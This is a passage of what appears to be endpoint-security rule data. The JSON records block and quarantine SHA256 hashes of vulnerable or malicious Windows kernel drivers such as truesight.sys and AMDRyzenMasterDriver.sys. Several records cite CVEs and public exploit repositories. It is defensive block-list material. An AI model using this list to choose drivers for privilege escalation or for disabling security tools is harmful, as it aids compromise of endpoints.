"2026-03-23T11:45:30.829104Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b74f31ad89c969bd1e154729c3e50136a3804fb759d164ed9d3247d791122b6b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "00634432-7aa3-53f2-b194-f49bb3bf6de4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824969Z", + "creation_date": "2026-03-23T11:45:31.824972Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824981Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b11d13216855f507240d4e5d56bd5f53ce38669db22a7a6d6a0b37bba99e0403", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0068f420-1cf4-599c-818a-683a69750f9a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145205Z", + "creation_date": "2026-03-23T11:45:32.145207Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145213Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"e7ff6a8a70471991d00525b02071eff55a2252d7f8dfb299ac2d169e811f6a84", + "comment": "Malicious Kernel Driver (aka driver_981d03e1.sys) [https://www.loldrivers.io/drivers/1106fe7a-b78b-4edf-85c0-6208979f380b/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0074af71-a717-5d22-aa31-f53758720ddc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154332Z", + "creation_date": "2026-03-23T11:45:31.154334Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154340Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7780bd43d0642303063ddaeca5de98b997d6302f6e6a4fd496561b13262a3b74", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "008468fd-f453-54a0-b63e-7e7c7ff7c681", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159229Z", + "creation_date": "2026-03-23T11:45:31.159231Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159236Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2f43846327935f1cc29daf07730eb39f44cd3b26c770df770d2068a9a5e2aed0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0088cc75-6f09-5f46-b77e-30f2c576971e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494846Z", + "creation_date": "2026-03-23T11:45:31.494848Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494855Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "322d95fbb0e6a856576a4fe58c30fb67eab8fb2ca29512972d65145cbce73016", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "00896919-433d-5110-b167-1ba05552c2a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830040Z", + "creation_date": "2026-03-23T11:45:30.830042Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830048Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d01d0e15698f945ff5a4c6db58fa66841122daad129298aa10e1d460c2b25a53", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0093ca17-b196-5fee-b016-5531682b7457", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457831Z", + "creation_date": 
"2026-03-23T11:45:30.457835Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457844Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0cf91e8f64a7c98dbeab21597bd76723aee892ed8fa4ee44b09f9e75089308e2", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0094a78f-4b42-525b-ab15-4e66cd3fe9b1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495058Z", + "creation_date": "2026-03-23T11:45:31.495060Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495066Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "825f9c3992e03dfad566039f1651228ba74195f04e4b715ff9a6dc339236a136", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "009b7d33-88a2-5c92-8026-74cfb6b2c2d1", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975516Z", + "creation_date": "2026-03-23T11:45:29.975518Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975524Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a67131e5e7ea45a8b53b6f924d418dfda716a00c2b12ab4d6ee5724c9f0d5549", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "00a40f0a-fd59-59ae-a047-1fd24b02af7d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980716Z", + "creation_date": "2026-03-23T11:45:29.980718Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980723Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2121a2bb8ebbf2e6e82c782b6f3c6b7904f686aa495def25cf1cf52a42e16109", + "comment": "Vulnerable Kernel Driver (aka CtiIo64.sys) [https://www.loldrivers.io/drivers/de365e80-45cb-48fb-af6e-0a96a5ad7777/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "00a97769-b5ce-5b5f-8719-44bbe3d869ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476420Z", + "creation_date": "2026-03-23T11:45:30.476427Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476439Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3b7177e9a10c1392633c5f605600bb23c8629379f7f42957972374a05d4dc458", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "00aa84e7-b9ff-54be-8e11-7cd6003e0bb3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810236Z", + "creation_date": "2026-03-23T11:45:31.810238Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810244Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff439e7007d97b7e56acfb95ba29a9c9884bf5c0242ff46d11e5cfd8ac5ecfe0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "00b98a8c-3b1d-5429-bd09-b4c326e2a065", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606723Z", + "creation_date": "2026-03-23T11:45:29.606725Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606731Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "cee01c69cb0c06dd0d98ff05aeb2b0a34a4aa1a71d35a3033bf9c1a35b637c55", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "00cd50bc-fafd-52ec-9d30-ea16cf31b1b1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822385Z", + "creation_date": "2026-03-23T11:45:31.822388Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822396Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b458eb6aad837cb6723320ceea1883c07ada507659a4688aedb46954f3f33417", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "00d00975-c936-5c33-a724-cc64bbb5bdb4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620460Z", + "creation_date": "2026-03-23T11:45:29.620462Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620468Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e81230217988f3e7ec6f89a06d231ec66039bdba340fd8ebb2bbb586506e3293", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "00e1229c-c643-5b96-9676-3995625f21e0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487291Z", + "creation_date": "2026-03-23T11:45:31.487293Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487298Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "10c033adf816f4d502e5fa15c0642f0be92bb921b63f1a3190ed41267d60156f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "00ed41f8-421e-5823-8056-ca7604607c57", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613347Z", + "creation_date": "2026-03-23T11:45:29.613351Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613357Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6ed35f310c96920a271c59a097b382da07856e40179c2a4239f8daa04eef38e7", + "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "00f33ddc-9494-5bbd-b8cd-111fe5662e07", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475154Z", + "creation_date": "2026-03-23T11:45:31.475157Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475167Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "92ab76ddfafbaaec1e358bdf558ec23ea6d029c81f80d01ddf89a9daed8d564f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "00f58f92-a180-572c-81d4-f5f9420317f0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830528Z", + "creation_date": "2026-03-23T11:45:30.830530Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830536Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9e26f64ae78fe305565876b7c28b543fc086900fb41756c2c21a767d7aa3004e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "00f9d36c-45ee-59c9-982a-1e3a3612b049", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453548Z", + "creation_date": "2026-03-23T11:45:30.453552Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453561Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fe425d4ea7c8d8bc2e8f32969d058f06a02ab11a0e15e465b989e526be17ca84", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0101d602-6d30-5816-a914-ae5d5464a0db", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155188Z", + "creation_date": "2026-03-23T11:45:31.155190Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155196Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f93092156ac39b5ff400cc1378edd5d74a96d0ec01fa2691ad678a49916bbb20", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "01020362-84a7-5ae0-8498-32e1944fbd8d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143936Z", + "creation_date": "2026-03-23T11:45:32.143938Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143944Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "765869c7c04b49e77de313806398472ec90dce45206a6d71e448d4e2e499715d", + "comment": "Vulnerable Kernel Driver (aka Afd.sys) [https://www.loldrivers.io/drivers/394f49b2-2d78-4d0d-b374-1399695455f3/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0107bfa0-5fac-5b43-bd30-6fc3ef784280", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497896Z", + "creation_date": "2026-03-23T11:45:31.497900Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497909Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2888b243fe734e4bd33e8bb7f92a39f005653c9bf0defca5d34ff150c6b0cb9c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "010e8b7d-18ae-5abe-a415-c39532ce008a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808704Z", + "creation_date": "2026-03-23T11:45:31.808706Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808712Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "73383892b9298fe716e2aa02fdf2e7d07169fa297fba3bb6090ec47fa648dae0", 
